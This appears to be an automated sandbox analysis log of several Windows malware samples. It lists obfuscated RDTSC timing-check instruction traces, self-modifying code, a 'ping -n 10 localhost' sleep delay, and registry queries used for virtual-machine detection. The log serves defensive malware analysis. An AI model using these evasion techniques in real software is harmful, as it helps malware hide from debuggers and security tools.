Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050012 second address: 505007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4E3CF4808Eh 0x00000011 jmp 00007F4E3CF48095h 0x00000016 popfd 0x00000017 push eax 0x00000018 mov si, bx 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f call 00007F4E3CF4808Fh 0x00000024 mov ebx, ecx 0x00000026 pop ecx 0x00000027 movsx ebx, ax 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F4E3CF48093h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 505007B second address: 5050081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050081 second address: 5050085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050085 second address: 5050089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050089 second address: 50500C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 46DFh 0x00000011 pushfd 0x00000012 jmp 00007F4E3CF48094h 0x00000017 xor cx, 5148h 0x0000001c jmp 00007F4E3CF4808Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50500C1 second address: 5050153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 push edx 0x00000011 mov edi, esi 0x00000013 pop ecx 0x00000014 popad 0x00000015 push esp 0x00000016 pushad 0x00000017 mov ah, 9Eh 0x00000019 jmp 00007F4E3C53658Fh 0x0000001e popad 0x0000001f mov dword ptr [esp], ecx 0x00000022 jmp 00007F4E3C536596h 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F4E3C536590h 0x0000002d push eax 0x0000002e jmp 00007F4E3C53658Bh 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 call 00007F4E3C536594h 0x0000003a mov edi, eax 0x0000003c pop ecx 0x0000003d pushad 0x0000003e mov cx, di 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050153 second address: 50501F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebx, dword ptr [ebp+10h] 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4E3CF4808Bh 0x00000010 adc ax, A1BEh 0x00000015 jmp 00007F4E3CF48099h 0x0000001a popfd 0x0000001b mov ax, A307h 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 jmp 00007F4E3CF4808Ah 0x00000026 push eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F4E3CF48091h 0x0000002e and cx, FEA6h 0x00000033 jmp 00007F4E3CF48091h 0x00000038 popfd 0x00000039 movzx ecx, dx 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F4E3CF48094h 0x00000047 adc esi, 14BEAF78h 0x0000004d jmp 00007F4E3CF4808Bh 0x00000052 popfd 0x00000053 mov ch, 86h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50501F5 second address: 50501FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50501FB second address: 5050214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bh, 67h 0x00000016 mov bh, cl 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050214 second address: 5050235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E3C53658Eh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050235 second address: 50502BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F4E3CF48096h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4E3CF4808Dh 0x00000018 sub ecx, 135DA436h 0x0000001e jmp 00007F4E3CF48091h 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F4EAF096416h 0x0000002b jmp 00007F4E3CF4808Eh 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007F4E3CF48090h 0x0000003c je 00007F4EAF096401h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov ax, dx 0x00000048 mov ah, bh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50502BF second address: 50502C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50502C5 second address: 50502C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50502C9 second address: 50502CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50502CD second address: 5050303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4E3CF48092h 0x00000014 sub esi, 4B5D5818h 0x0000001a jmp 00007F4E3CF4808Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5050303 second address: 5050317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3C536590h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080019 second address: 508001D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508001D second address: 5080023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080023 second address: 5080029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080029 second address: 508002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508002D second address: 5080050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4E3CF48098h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080050 second address: 50800C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4E3C53658Fh 0x00000013 sub esi, 62D350FEh 0x00000019 jmp 00007F4E3C536599h 0x0000001e popfd 0x0000001f mov ecx, 650F5947h 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b pop edx 0x0000002c jmp 00007F4E3C536592h 0x00000031 popad 0x00000032 and esp, FFFFFFF8h 0x00000035 jmp 00007F4E3C536590h 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50800C7 second address: 50800CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50800CB second address: 50800CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50800CF second address: 50800D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50800D5 second address: 5080108 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov si, 7C5Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edi, esi 0x00000012 pushfd 0x00000013 jmp 00007F4E3C536590h 0x00000018 add al, FFFFFFE8h 0x0000001b jmp 00007F4E3C53658Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080108 second address: 508011C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, CCh 0x00000005 mov esi, 564D23D7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508011C second address: 5080120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080120 second address: 508012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508012F second address: 5080182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007F4E3C53658Bh 0x0000000b and cx, 788Eh 0x00000010 jmp 00007F4E3C536599h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a jmp 00007F4E3C53658Eh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4E3C53658Eh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080182 second address: 50801B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4E3CF48091h 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, 527Bh 0x00000016 jmp 00007F4E3CF48090h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50801B5 second address: 50801BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50801BB second address: 50801BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50801BF second address: 50801C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50801C3 second address: 5080223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4E3CF4808Fh 0x00000012 or esi, 589E0E0Eh 0x00000018 jmp 00007F4E3CF48099h 0x0000001d popfd 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 sub ebx, ebx 0x00000023 jmp 00007F4E3CF48093h 0x00000028 test esi, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d movsx ebx, cx 0x00000030 mov dx, si 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080223 second address: 5080272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4EAE64C6D4h 0x0000000f jmp 00007F4E3C53658Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c mov edx, eax 0x0000001e mov si, E619h 0x00000022 popad 0x00000023 mov ecx, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4E3C53658Bh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080272 second address: 508028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3CF48094h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508028A second address: 50802A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4EAE64C697h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4E3C53658Ah 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50802A4 second address: 5080303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E3CF48091h 0x00000009 sub cx, 2676h 0x0000000e jmp 00007F4E3CF48091h 0x00000013 popfd 0x00000014 jmp 00007F4E3CF48090h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test byte ptr [77226968h], 00000002h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F4E3CF48097h 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080303 second address: 5080309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080309 second address: 508030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508030D second address: 5080311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080311 second address: 5080327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F4EAF05E123h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop edi 0x00000013 mov ebx, ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080327 second address: 5080370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F4E3C53658Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F4E3C536590h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4E3C53658Dh 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080370 second address: 5080385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5080385 second address: 508038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508038B second address: 50803C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F4E3CF48096h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50803C2 second address: 50803C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50803C6 second address: 50803CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50803CC second address: 508042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4E3C536591h 0x00000011 and al, 00000076h 0x00000014 jmp 00007F4E3C536591h 0x00000019 popfd 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4E3C536599h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 508042C second address: 5080432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50804D4 second address: 50804D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50804D8 second address: 50804DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 50804DE second address: 50804E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070123 second address: 5070127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070127 second address: 507012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 507012D second address: 507016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 09444833h 0x00000008 pushfd 0x00000009 jmp 00007F4E3CF48098h 0x0000000e xor cx, 1038h 0x00000013 jmp 00007F4E3CF4808Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ah, 37h 0x00000022 mov edx, 092118B2h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 507016E second address: 5070174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070174 second address: 5070178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: 5070178 second address: 507019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4E3C536598h 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Special instruction interceptor: First address: DE2A6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Special instruction interceptor: First address: F8C0EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Special instruction interceptor: First address: FB6FF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Special instruction interceptor: First address: 101999B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: DC2A6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: F6C0EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: F96FF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: FF999B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Special instruction interceptor: First address: C5F31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Special instruction interceptor: First address: C5E7D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Special instruction interceptor: First address: 294F4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Special instruction interceptor: First address: 27CC3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Special instruction interceptor: First address: 2F4FE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Special instruction interceptor: First address: D15B66 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Special instruction interceptor: First address: D15A5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Special instruction interceptor: First address: F457C6 instructions caused by: Self-modifying code

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Memory allocated: E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Memory allocated: 28C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Memory allocated: 1780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Memory allocated: E40000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Memory allocated: 1AAD0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

Code function: 3_2_050E05B9 rdtsc

3_2_050E05B9

